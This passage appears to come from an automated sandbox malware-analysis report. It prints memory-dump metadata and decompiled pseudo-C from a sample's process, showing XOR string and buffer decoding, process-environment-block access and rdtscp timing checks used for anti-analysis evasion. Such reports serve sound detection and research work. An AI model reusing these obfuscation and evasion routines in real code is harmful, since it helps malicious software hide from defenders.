                                                                                                                                                                                                                    0x00a7ea8a
                                                                                                                                                                                                                    0x00a7ea8e
                                                                                                                                                                                                                    0x00a7ea95
                                                                                                                                                                                                                    0x00a7eaa0
                                                                                                                                                                                                                    0x00a7eaa9
                                                                                                                                                                                                                    0x00a7eab7
                                                                                                                                                                                                                    0x00a7eac4
                                                                                                                                                                                                                    0x00a7eac6
                                                                                                                                                                                                                    0x00a7ead3
                                                                                                                                                                                                                    0x00a7ead5
                                                                                                                                                                                                                    0x00a7eadb
                                                                                                                                                                                                                    0x00a7eae1
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7eae3
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7eae1
                                                                                                                                                                                                                    0x00a7eae5
                                                                                                                                                                                                                    0x00a7eae7
                                                                                                                                                                                                                    0x00a7eae7
                                                                                                                                                                                                                    0x00a7eaeb
                                                                                                                                                                                                                    0x00a7eaeb
                                                                                                                                                                                                                    0x00a7eaec
                                                                                                                                                                                                                    0x00a7eb0b
                                                                                                                                                                                                                    0x00a7eb10
                                                                                                                                                                                                                    0x00a7eb1a

                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.845522080.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 276e06dc178d420c13cca037212bee107c402319697f4633db523099ae52cef3
                                                                                                                                                                                                                    • Instruction ID: af3cc7ce647010bb6508edd99644080dbf39b33a76cb2768045c04ca12cf301a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 276e06dc178d420c13cca037212bee107c402319697f4633db523099ae52cef3
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9C41E0B1D01219EBDF08DFA4D94A9EEBBB5FB48304F20819AE415B6250E3B45B44CFA4
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                                                                                                    			E00A7AF4E(void* __ecx, void* __edx, void* __eflags) {
                                                                                                                                                                                                                    				void* _t45;
                                                                                                                                                                                                                    				signed int _t51;
                                                                                                                                                                                                                    				unsigned int* _t63;
                                                                                                                                                                                                                    				signed int _t64;
                                                                                                                                                                                                                    				signed int _t66;
                                                                                                                                                                                                                    				signed int _t67;
                                                                                                                                                                                                                    				signed int _t71;
                                                                                                                                                                                                                    				unsigned int _t72;
                                                                                                                                                                                                                    				unsigned int _t73;
                                                                                                                                                                                                                    				unsigned int* _t78;
                                                                                                                                                                                                                    				signed int* _t79;
                                                                                                                                                                                                                    				signed int* _t80;
                                                                                                                                                                                                                    				signed int* _t81;
                                                                                                                                                                                                                    				unsigned int _t83;
                                                                                                                                                                                                                    				void* _t89;
                                                                                                                                                                                                                    				void* _t91;
                                                                                                                                                                                                                    				void* _t93;
                                                                                                                                                                                                                    				void* _t94;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_t81 =  *(_t93 + 0x2c);
                                                                                                                                                                                                                    				_push(_t81);
                                                                                                                                                                                                                    				_push( *(_t93 + 0x30));
                                                                                                                                                                                                                    				_push( *(_t93 + 0x30));
                                                                                                                                                                                                                    				E00A7C6D8(_t45);
                                                                                                                                                                                                                    				 *(_t93 + 0x30) =  *(_t93 + 0x30) & 0x00000000;
                                                                                                                                                                                                                    				_t79 =  &(_t81[1]);
                                                                                                                                                                                                                    				 *(_t93 + 0x34) =  *(_t93 + 0x34) & 0x00000000;
                                                                                                                                                                                                                    				 *(_t93 + 0x2c) = 0x9dd844;
                                                                                                                                                                                                                    				 *(_t93 + 0x44) = 0xa049fd;
                                                                                                                                                                                                                    				_t66 = 0x39;
                                                                                                                                                                                                                    				 *(_t93 + 0x44) =  *(_t93 + 0x44) * 0x5e;
                                                                                                                                                                                                                    				 *(_t93 + 0x44) =  *(_t93 + 0x44) + 0xffff3d0a;
                                                                                                                                                                                                                    				 *(_t93 + 0x44) =  *(_t93 + 0x44) / _t66;
                                                                                                                                                                                                                    				 *(_t93 + 0x44) =  *(_t93 + 0x44) ^ 0x01039bca;
                                                                                                                                                                                                                    				 *(_t93 + 0x20) = 0xc35971;
                                                                                                                                                                                                                    				 *(_t93 + 0x20) =  *(_t93 + 0x20) >> 5;
                                                                                                                                                                                                                    				 *(_t93 + 0x20) =  *(_t93 + 0x20) ^ 0x000e2e4b;
                                                                                                                                                                                                                    				_t67 =  *_t81;
                                                                                                                                                                                                                    				_t80 =  &(_t79[1]);
                                                                                                                                                                                                                    				_t51 =  *_t79 ^ _t67;
                                                                                                                                                                                                                    				 *(_t93 + 0x24) = _t67;
                                                                                                                                                                                                                    				 *(_t93 + 0x28) = _t51;
                                                                                                                                                                                                                    				_t30 = _t51 + 1; // 0xffff3d0b
                                                                                                                                                                                                                    				_t83 =  !=  ? (_t30 & 0xfffffffc) + 4 : _t30;
                                                                                                                                                                                                                    				_t63 = E00A7C6D9(_t83);
                                                                                                                                                                                                                    				_t94 = _t93 + 0x18;
                                                                                                                                                                                                                    				 *(_t94 + 0x30) = _t63;
                                                                                                                                                                                                                    				if(_t63 != 0) {
                                                                                                                                                                                                                    					_t91 = 0;
                                                                                                                                                                                                                    					_t78 = _t63;
                                                                                                                                                                                                                    					_t89 =  >  ? 0 :  &(_t80[_t83 >> 2]) - _t80 + 3 >> 2;
                                                                                                                                                                                                                    					if(_t89 != 0) {
                                                                                                                                                                                                                    						_t64 =  *(_t94 + 0x14);
                                                                                                                                                                                                                    						do {
                                                                                                                                                                                                                    							_t71 =  *_t80;
                                                                                                                                                                                                                    							_t80 =  &(_t80[1]);
                                                                                                                                                                                                                    							_t72 = _t71 ^ _t64;
                                                                                                                                                                                                                    							 *_t78 = _t72;
                                                                                                                                                                                                                    							_t78 =  &(_t78[1]);
                                                                                                                                                                                                                    							_t73 = _t72 >> 0x10;
                                                                                                                                                                                                                    							 *((char*)(_t78 - 3)) = _t72 >> 8;
                                                                                                                                                                                                                    							 *(_t78 - 2) = _t73;
                                                                                                                                                                                                                    							_t91 = _t91 + 1;
                                                                                                                                                                                                                    							 *((char*)(_t78 - 1)) = _t73 >> 8;
                                                                                                                                                                                                                    						} while (_t91 < _t89);
                                                                                                                                                                                                                    						_t63 =  *(_t94 + 0x34);
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					 *((char*)(_t63 +  *((intOrPtr*)(_t94 + 0x18)))) = 0;
                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                    				return _t63;
                                                                                                                                                                                                                    			}





















                                                                                                                                                                                                                    0x00a7af53
                                                                                                                                                                                                                    0x00a7af58
                                                                                                                                                                                                                    0x00a7af59
                                                                                                                                                                                                                    0x00a7af5d
                                                                                                                                                                                                                    0x00a7af63
                                                                                                                                                                                                                    0x00a7af68
                                                                                                                                                                                                                    0x00a7af6d
                                                                                                                                                                                                                    0x00a7af70
                                                                                                                                                                                                                    0x00a7af77
                                                                                                                                                                                                                    0x00a7af7f
                                                                                                                                                                                                                    0x00a7af8e
                                                                                                                                                                                                                    0x00a7af8f
                                                                                                                                                                                                                    0x00a7af93
                                                                                                                                                                                                                    0x00a7afa1
                                                                                                                                                                                                                    0x00a7afa5
                                                                                                                                                                                                                    0x00a7afad
                                                                                                                                                                                                                    0x00a7afb5
                                                                                                                                                                                                                    0x00a7afba
                                                                                                                                                                                                                    0x00a7afc2
                                                                                                                                                                                                                    0x00a7afc6
                                                                                                                                                                                                                    0x00a7afc9
                                                                                                                                                                                                                    0x00a7afcb
                                                                                                                                                                                                                    0x00a7afcf
                                                                                                                                                                                                                    0x00a7afd3
                                                                                                                                                                                                                    0x00a7afe3
                                                                                                                                                                                                                    0x00a7aff4
                                                                                                                                                                                                                    0x00a7aff6
                                                                                                                                                                                                                    0x00a7aff9
                                                                                                                                                                                                                    0x00a7afff
                                                                                                                                                                                                                    0x00a7b007
                                                                                                                                                                                                                    0x00a7b009
                                                                                                                                                                                                                    0x00a7b01a
                                                                                                                                                                                                                    0x00a7b01f
                                                                                                                                                                                                                    0x00a7b021
                                                                                                                                                                                                                    0x00a7b025
                                                                                                                                                                                                                    0x00a7b025
                                                                                                                                                                                                                    0x00a7b027
                                                                                                                                                                                                                    0x00a7b02a
                                                                                                                                                                                                                    0x00a7b02c
                                                                                                                                                                                                                    0x00a7b033
                                                                                                                                                                                                                    0x00a7b036
                                                                                                                                                                                                                    0x00a7b039
                                                                                                                                                                                                                    0x00a7b03c
                                                                                                                                                                                                                    0x00a7b042
                                                                                                                                                                                                                    0x00a7b043
                                                                                                                                                                                                                    0x00a7b046
                                                                                                                                                                                                                    0x00a7b04a
                                                                                                                                                                                                                    0x00a7b04a
                                                                                                                                                                                                                    0x00a7b053
                                                                                                                                                                                                                    0x00a7b053
                                                                                                                                                                                                                    0x00a7b05f

                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.845522080.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 833d47e63a79efb329626dfcacc13cad45bf6eb69fed7a30708c3c2ee5688b8b
                                                                                                                                                                                                                    • Instruction ID: d5851614bfa7e4a98e861bcfbf87ecbe89d5042ad76fe420e46e9a554a2a8e55
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 833d47e63a79efb329626dfcacc13cad45bf6eb69fed7a30708c3c2ee5688b8b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AA31BE72A193408FC314CF28C985A5BFBE4FF89714F458A2DF58997200C775D905CB92
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 89%
                                                                                                                                                                                                                    			E00A6F1F6(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                                                    				unsigned int _v20;
                                                                                                                                                                                                                    				signed int _v24;
                                                                                                                                                                                                                    				signed int _v28;
                                                                                                                                                                                                                    				signed int _v32;
                                                                                                                                                                                                                    				signed int _v36;
                                                                                                                                                                                                                    				void* _t89;
                                                                                                                                                                                                                    				signed int _t106;
                                                                                                                                                                                                                    				signed int _t107;
                                                                                                                                                                                                                    				void* _t118;
                                                                                                                                                                                                                    				signed int _t119;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_push(_a8);
                                                                                                                                                                                                                    				_t118 = __edx;
                                                                                                                                                                                                                    				_push(_a4);
                                                                                                                                                                                                                    				_push(__edx);
                                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                                    				E00A7C6D8(_t89);
                                                                                                                                                                                                                    				_v24 = 0x22b0d3;
                                                                                                                                                                                                                    				_v24 = _v24 >> 5;
                                                                                                                                                                                                                    				_v24 = _v24 ^ 0x0007326d;
                                                                                                                                                                                                                    				_v20 = 0x142842;
                                                                                                                                                                                                                    				_v20 = _v20 >> 0x10;
                                                                                                                                                                                                                    				_v20 = _v20 >> 0xf;
                                                                                                                                                                                                                    				_v20 = _v20 ^ 0x00018317;
                                                                                                                                                                                                                    				_v8 = 0x1381c8;
                                                                                                                                                                                                                    				_v8 = _v8 | 0x081d5080;
                                                                                                                                                                                                                    				_t106 = 0x7d;
                                                                                                                                                                                                                    				_v8 = _v8 / _t106;
                                                                                                                                                                                                                    				_v8 = _v8 / _t106;
                                                                                                                                                                                                                    				_v8 = _v8 ^ 0x000fe388;
                                                                                                                                                                                                                    				_v16 = 0x960f8a;
                                                                                                                                                                                                                    				_v16 = _v16 + 0xaccc;
                                                                                                                                                                                                                    				_v16 = _v16 ^ 0xaa905e7a;
                                                                                                                                                                                                                    				_v16 = _v16 ^ 0xaa0efbe0;
                                                                                                                                                                                                                    				_v32 = 0xa1d96a;
                                                                                                                                                                                                                    				_t107 = 0x34;
                                                                                                                                                                                                                    				_v32 = _v32 / _t107;
                                                                                                                                                                                                                    				_v32 = _v32 + 0x60b2;
                                                                                                                                                                                                                    				_v32 = _v32 ^ 0x0009a154;
                                                                                                                                                                                                                    				_v28 = 0xd31183;
                                                                                                                                                                                                                    				_v28 = _v28 | 0xcfdd19cc;
                                                                                                                                                                                                                    				_v28 = _v28 >> 0xf;
                                                                                                                                                                                                                    				_v28 = _v28 ^ 0x0004dbc1;
                                                                                                                                                                                                                    				_v36 = 0x24a1c8;
                                                                                                                                                                                                                    				_v36 = _v36 ^ 0x0fd31c73;
                                                                                                                                                                                                                    				_v36 = _v36 ^ 0x0ff5ff22;
                                                                                                                                                                                                                    				E00A773DE();
                                                                                                                                                                                                                    				_v12 = 0x922d03;
                                                                                                                                                                                                                    				_v12 = _v12 >> 3;
                                                                                                                                                                                                                    				_v12 = _v12 + 0xffffd6cd;
                                                                                                                                                                                                                    				_v12 = _v12 << 0xa;
                                                                                                                                                                                                                    				_v12 = _v12 ^ 0x4871b404;
                                                                                                                                                                                                                    				_v24 = 0xf5443d;
                                                                                                                                                                                                                    				_v24 = _v24 + 0x4015;
                                                                                                                                                                                                                    				_v24 = _v24 >> 0xa;
                                                                                                                                                                                                                    				_v24 = _v24 ^ 0x00003d71;
                                                                                                                                                                                                                    				_t119 = E00A75103(_v24, _v12);
                                                                                                                                                                                                                    				E00A7CD47(_v32, _t118, _t119, _v28, 1, _v36);
                                                                                                                                                                                                                    				 *((short*)(_t118 + _t119 * 2)) = 0;
                                                                                                                                                                                                                    				return 0;
                                                                                                                                                                                                                    			}
















                                                                                                                                                                                                                    0x00a6f1fe
                                                                                                                                                                                                                    0x00a6f201
                                                                                                                                                                                                                    0x00a6f203
                                                                                                                                                                                                                    0x00a6f206
                                                                                                                                                                                                                    0x00a6f207
                                                                                                                                                                                                                    0x00a6f208
                                                                                                                                                                                                                    0x00a6f20d
                                                                                                                                                                                                                    0x00a6f216
                                                                                                                                                                                                                    0x00a6f21a
                                                                                                                                                                                                                    0x00a6f221
                                                                                                                                                                                                                    0x00a6f228
                                                                                                                                                                                                                    0x00a6f22c
                                                                                                                                                                                                                    0x00a6f230
                                                                                                                                                                                                                    0x00a6f237
                                                                                                                                                                                                                    0x00a6f23e
                                                                                                                                                                                                                    0x00a6f24a
                                                                                                                                                                                                                    0x00a6f24f
                                                                                                                                                                                                                    0x00a6f259
                                                                                                                                                                                                                    0x00a6f25e
                                                                                                                                                                                                                    0x00a6f265
                                                                                                                                                                                                                    0x00a6f26c
                                                                                                                                                                                                                    0x00a6f273
                                                                                                                                                                                                                    0x00a6f27a
                                                                                                                                                                                                                    0x00a6f281
                                                                                                                                                                                                                    0x00a6f28b
                                                                                                                                                                                                                    0x00a6f28e
                                                                                                                                                                                                                    0x00a6f291
                                                                                                                                                                                                                    0x00a6f298
                                                                                                                                                                                                                    0x00a6f29f
                                                                                                                                                                                                                    0x00a6f2a6
                                                                                                                                                                                                                    0x00a6f2ad
                                                                                                                                                                                                                    0x00a6f2b1
                                                                                                                                                                                                                    0x00a6f2b8
                                                                                                                                                                                                                    0x00a6f2bf
                                                                                                                                                                                                                    0x00a6f2c6
                                                                                                                                                                                                                    0x00a6f2d0
                                                                                                                                                                                                                    0x00a6f2d5
                                                                                                                                                                                                                    0x00a6f2df
                                                                                                                                                                                                                    0x00a6f2e3
                                                                                                                                                                                                                    0x00a6f2ea
                                                                                                                                                                                                                    0x00a6f2ee
                                                                                                                                                                                                                    0x00a6f2f5
                                                                                                                                                                                                                    0x00a6f2fc
                                                                                                                                                                                                                    0x00a6f303
                                                                                                                                                                                                                    0x00a6f307
                                                                                                                                                                                                                    0x00a6f325
                                                                                                                                                                                                                    0x00a6f332
                                                                                                                                                                                                                    0x00a6f33c
                                                                                                                                                                                                                    0x00a6f345

                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.845522080.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 874fe3f2e1aa03b35692fcf538e391f026b60c34d71aad2f1d5ba755b4d2307a
                                                                                                                                                                                                                    • Instruction ID: 37425e75efed09265f747c72de5bddc1ed92aad032604ef85d33d6f04358d02b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 874fe3f2e1aa03b35692fcf538e391f026b60c34d71aad2f1d5ba755b4d2307a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 27410271D0120EEBDF48DFA5C94A8EEBBB1EF44308F208058E514BA260D7B81B55DF91
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                    			E00A6DB4C() {
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				return  *[fs:0x30];
                                                                                                                                                                                                                    			}



                                                                                                                                                                                                                    0x00a6db52

                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.845522080.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                                                                                                                                    • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                    C-Code - Quality: 52%
                                                                                                                                                                                                                    			E6F206530(void* __ebx, signed int __ecx, void* __edx, intOrPtr _a24849, intOrPtr _a99626) {
                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                                                                    				void* _v28;
                                                                                                                                                                                                                    				signed int _v36;
                                                                                                                                                                                                                    				signed int _v48;
                                                                                                                                                                                                                    				char _v52;
                                                                                                                                                                                                                    				intOrPtr _v68;
                                                                                                                                                                                                                    				intOrPtr _v72;
                                                                                                                                                                                                                    				signed char _v76;
                                                                                                                                                                                                                    				char _v80;
                                                                                                                                                                                                                    				signed int* _v100;
                                                                                                                                                                                                                    				intOrPtr _v108;
                                                                                                                                                                                                                    				signed int _v116;
                                                                                                                                                                                                                    				signed int _v120;
                                                                                                                                                                                                                    				intOrPtr* _v124;
                                                                                                                                                                                                                    				void* _v136;
                                                                                                                                                                                                                    				void* _v148;
                                                                                                                                                                                                                    				signed int _v164;
                                                                                                                                                                                                                    				signed int _v172;
                                                                                                                                                                                                                    				void* _v176;
                                                                                                                                                                                                                    				signed int _v192;
                                                                                                                                                                                                                    				unsigned int _v196;
                                                                                                                                                                                                                    				signed int _v200;
                                                                                                                                                                                                                    				signed int _v204;
                                                                                                                                                                                                                    				signed char _v208;
                                                                                                                                                                                                                    				signed int* _v212;
                                                                                                                                                                                                                    				signed int* _v216;
                                                                                                                                                                                                                    				signed short* _v220;
                                                                                                                                                                                                                    				signed char _v224;
                                                                                                                                                                                                                    				signed char _v228;
                                                                                                                                                                                                                    				void* _v232;
                                                                                                                                                                                                                    				signed int _v236;
                                                                                                                                                                                                                    				signed int _v240;
                                                                                                                                                                                                                    				signed char _v244;
                                                                                                                                                                                                                    				intOrPtr _v248;
                                                                                                                                                                                                                    				void* _v252;
                                                                                                                                                                                                                    				signed char _v256;
                                                                                                                                                                                                                    				intOrPtr _v264;
                                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                    				signed int _t362;
                                                                                                                                                                                                                    				signed int _t363;
                                                                                                                                                                                                                    				void* _t368;
                                                                                                                                                                                                                    				void* _t370;
                                                                                                                                                                                                                    				void* _t374;
                                                                                                                                                                                                                    				signed int _t375;
                                                                                                                                                                                                                    				signed int _t376;
                                                                                                                                                                                                                    				signed int* _t382;
                                                                                                                                                                                                                    				signed int _t384;
                                                                                                                                                                                                                    				signed int _t390;
                                                                                                                                                                                                                    				signed char _t391;
                                                                                                                                                                                                                    				void* _t393;
                                                                                                                                                                                                                    				void* _t397;
                                                                                                                                                                                                                    				intOrPtr* _t400;
                                                                                                                                                                                                                    				signed int _t402;
                                                                                                                                                                                                                    				signed int _t403;
                                                                                                                                                                                                                    				signed char _t407;
                                                                                                                                                                                                                    				signed int* _t408;
                                                                                                                                                                                                                    				void* _t410;
                                                                                                                                                                                                                    				signed int _t415;
                                                                                                                                                                                                                    				signed int* _t418;
                                                                                                                                                                                                                    				signed int _t421;
                                                                                                                                                                                                                    				void* _t423;
                                                                                                                                                                                                                    				signed int _t428;
                                                                                                                                                                                                                    				void* _t431;
                                                                                                                                                                                                                    				unsigned short _t440;
                                                                                                                                                                                                                    				unsigned int _t441;
                                                                                                                                                                                                                    				void* _t445;
                                                                                                                                                                                                                    				signed char _t455;
                                                                                                                                                                                                                    				signed int _t456;
                                                                                                                                                                                                                    				signed int* _t458;
                                                                                                                                                                                                                    				intOrPtr _t460;
                                                                                                                                                                                                                    				void* _t470;
                                                                                                                                                                                                                    				signed int _t473;
                                                                                                                                                                                                                    				signed char _t474;
                                                                                                                                                                                                                    				signed char _t475;
                                                                                                                                                                                                                    				signed int _t477;
                                                                                                                                                                                                                    				signed int _t481;
                                                                                                                                                                                                                    				signed int _t484;
                                                                                                                                                                                                                    				char _t485;
                                                                                                                                                                                                                    				void* _t489;
                                                                                                                                                                                                                    				signed int _t496;
                                                                                                                                                                                                                    				signed char _t497;
                                                                                                                                                                                                                    				signed int _t504;
                                                                                                                                                                                                                    				signed int _t511;
                                                                                                                                                                                                                    				void* _t512;
                                                                                                                                                                                                                    				intOrPtr _t519;
                                                                                                                                                                                                                    				signed int _t524;
                                                                                                                                                                                                                    				void* _t526;
                                                                                                                                                                                                                    				void* _t527;
                                                                                                                                                                                                                    				signed int _t530;
                                                                                                                                                                                                                    				intOrPtr _t539;
                                                                                                                                                                                                                    				intOrPtr _t541;
                                                                                                                                                                                                                    				void* _t543;
                                                                                                                                                                                                                    				signed int _t545;
                                                                                                                                                                                                                    				signed int _t546;
                                                                                                                                                                                                                    				signed int _t549;
                                                                                                                                                                                                                    				void* _t550;
                                                                                                                                                                                                                    				void* _t567;
                                                                                                                                                                                                                    				void* _t568;
                                                                                                                                                                                                                    				void* _t569;
                                                                                                                                                                                                                    				void* _t577;
                                                                                                                                                                                                                    				signed int _t582;
                                                                                                                                                                                                                    				void* _t583;
                                                                                                                                                                                                                    				void* _t585;
                                                                                                                                                                                                                    				signed int _t586;
                                                                                                                                                                                                                    				signed int _t590;
                                                                                                                                                                                                                    				signed char _t591;
                                                                                                                                                                                                                    				signed int _t597;
                                                                                                                                                                                                                    				signed int _t602;
                                                                                                                                                                                                                    				signed int _t606;
                                                                                                                                                                                                                    				signed int _t607;
                                                                                                                                                                                                                    				signed int _t613;
                                                                                                                                                                                                                    				signed char _t614;
                                                                                                                                                                                                                    				signed int _t620;
                                                                                                                                                                                                                    				signed int _t624;
                                                                                                                                                                                                                    				void* _t625;
                                                                                                                                                                                                                    				signed char _t640;
                                                                                                                                                                                                                    				intOrPtr* _t643;
                                                                                                                                                                                                                    				signed int _t659;
                                                                                                                                                                                                                    				signed int _t673;
                                                                                                                                                                                                                    				intOrPtr _t675;
                                                                                                                                                                                                                    				void* _t676;
                                                                                                                                                                                                                    				signed int* _t682;
                                                                                                                                                                                                                    				intOrPtr* _t683;
                                                                                                                                                                                                                    				signed int _t684;
                                                                                                                                                                                                                    				signed char _t691;
                                                                                                                                                                                                                    				char* _t693;
                                                                                                                                                                                                                    				intOrPtr* _t694;
                                                                                                                                                                                                                    				char* _t696;
                                                                                                                                                                                                                    				unsigned int _t697;
                                                                                                                                                                                                                    				signed int* _t699;
                                                                                                                                                                                                                    				signed int _t702;
                                                                                                                                                                                                                    				signed int* _t707;
                                                                                                                                                                                                                    				signed int _t708;
                                                                                                                                                                                                                    				signed int* _t709;
                                                                                                                                                                                                                    				signed int _t710;
                                                                                                                                                                                                                    				signed int* _t711;
                                                                                                                                                                                                                    				signed int _t712;
                                                                                                                                                                                                                    				signed short* _t713;
                                                                                                                                                                                                                    				signed int _t714;
                                                                                                                                                                                                                    				signed int _t715;
                                                                                                                                                                                                                    				signed int* _t716;
                                                                                                                                                                                                                    				signed int _t717;
                                                                                                                                                                                                                    				signed int _t718;
                                                                                                                                                                                                                    				void* _t719;
                                                                                                                                                                                                                    				signed int _t720;
                                                                                                                                                                                                                    				void* _t721;
                                                                                                                                                                                                                    				signed int _t722;
                                                                                                                                                                                                                    				intOrPtr* _t725;
                                                                                                                                                                                                                    				signed int _t727;
                                                                                                                                                                                                                    				intOrPtr* _t728;
                                                                                                                                                                                                                    				void* _t729;
                                                                                                                                                                                                                    				signed int* _t731;
                                                                                                                                                                                                                    				void* _t732;
                                                                                                                                                                                                                    				signed char _t736;
                                                                                                                                                                                                                    				signed char _t737;
                                                                                                                                                                                                                    				void* _t738;
                                                                                                                                                                                                                    				void* _t739;
                                                                                                                                                                                                                    				void* _t744;
                                                                                                                                                                                                                    				void* _t748;
                                                                                                                                                                                                                    				intOrPtr* _t751;
                                                                                                                                                                                                                    				void* _t752;
                                                                                                                                                                                                                    				signed int _t754;
                                                                                                                                                                                                                    				signed int _t756;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_t586 = __ecx;
                                                                                                                                                                                                                    				_t585 = __ebx;
                                                                                                                                                                                                                    				_t756 = (_t754 & 0xfffffff0) - 0xf8;
                                                                                                                                                                                                                    				_t362 =  *0x6f24b008; // 0x819f5d14
                                                                                                                                                                                                                    				_t363 = _t362 ^ _t756;
                                                                                                                                                                                                                    				_v8 = _t363;
                                                                                                                                                                                                                    				asm("movups xmm0, [ebp+0x8]");
                                                                                                                                                                                                                    				asm("movups [esp+0xb0], xmm0");
                                                                                                                                                                                                                    				asm("movups xmm0, [ebp+0x18]");
                                                                                                                                                                                                                    				asm("movups [esp+0xc0], xmm0");
                                                                                                                                                                                                                    				asm("movups xmm0, [ebp+0x28]");
                                                                                                                                                                                                                    				asm("movups [esp+0xd0], xmm0");
                                                                                                                                                                                                                    				asm("rdtscp");
                                                                                                                                                                                                                    				_v12 = __ecx;
                                                                                                                                                                                                                    				if(__edx != 0 || _t363 > 0x989680) {
                                                                                                                                                                                                                    					_v240 = 0xb8fea98;
                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                    					asm("rdtscp");
                                                                                                                                                                                                                    					_v12 = __ecx;
                                                                                                                                                                                                                    					_t363 = E6F236590(0x989680, 0, _t363, __edx);
                                                                                                                                                                                                                    					_v256 = _t363;
                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                    				asm("rdtscp");
                                                                                                                                                                                                                    				_v12 = _t586;
                                                                                                                                                                                                                    				_t588 = 0 + (_t363 * 0x1348 >> 0x20);
                                                                                                                                                                                                                    				_t368 = E6F236D60(_t363 * 0x1348, 0 + (_t363 * 0x1348 >> 0x20), 0x5f, 0);
                                                                                                                                                                                                                    				_t736 = _v256;
                                                                                                                                                                                                                    				_t16 = _t368 + 3; // 0x3
                                                                                                                                                                                                                    				_t707 = _t16;
                                                                                                                                                                                                                    				_v232 = _t707;
                                                                                                                                                                                                                    				asm("movsd xmm0, [0x6f245548]");
                                                                                                                                                                                                                    				_v136 = 0;
                                                                                                                                                                                                                    				_v28 = 0;
                                                                                                                                                                                                                    				_v252 = 0;
                                                                                                                                                                                                                    				_v244 = 0;
                                                                                                                                                                                                                    				_v192 = 0;
                                                                                                                                                                                                                    				_v220 = 0;
                                                                                                                                                                                                                    				_v236 = 0;
                                                                                                                                                                                                                    				asm("movsd [esp+0xa8], xmm0");
                                                                                                                                                                                                                    				_t370 = E6F202720(0, 0);
                                                                                                                                                                                                                    				asm("movsd [esp+0x68], xmm0");
                                                                                                                                                                                                                    				asm("xorps xmm0, xmm0");
                                                                                                                                                                                                                    				asm("movsd [esp+0x60], xmm0");
                                                                                                                                                                                                                    				E6F202720(_t370, 0);
                                                                                                                                                                                                                    				asm("addsd xmm0, [esp+0x68]");
                                                                                                                                                                                                                    				asm("movsd xmm1, [0x6f2454b0]");
                                                                                                                                                                                                                    				_t672 = _t736;
                                                                                                                                                                                                                    				asm("movsd [esp+0x80], xmm1");
                                                                                                                                                                                                                    				_t372 = _v100;
                                                                                                                                                                                                                    				_v212 = _v100;
                                                                                                                                                                                                                    				asm("mulsd xmm0, xmm1");
                                                                                                                                                                                                                    				asm("movsd xmm1, [0x6f2454d0]");
                                                                                                                                                                                                                    				asm("movsd [esp+0x68], xmm1");
                                                                                                                                                                                                                    				asm("divsd xmm0, xmm1");
                                                                                                                                                                                                                    				asm("movsd [esp+0x48], xmm0");
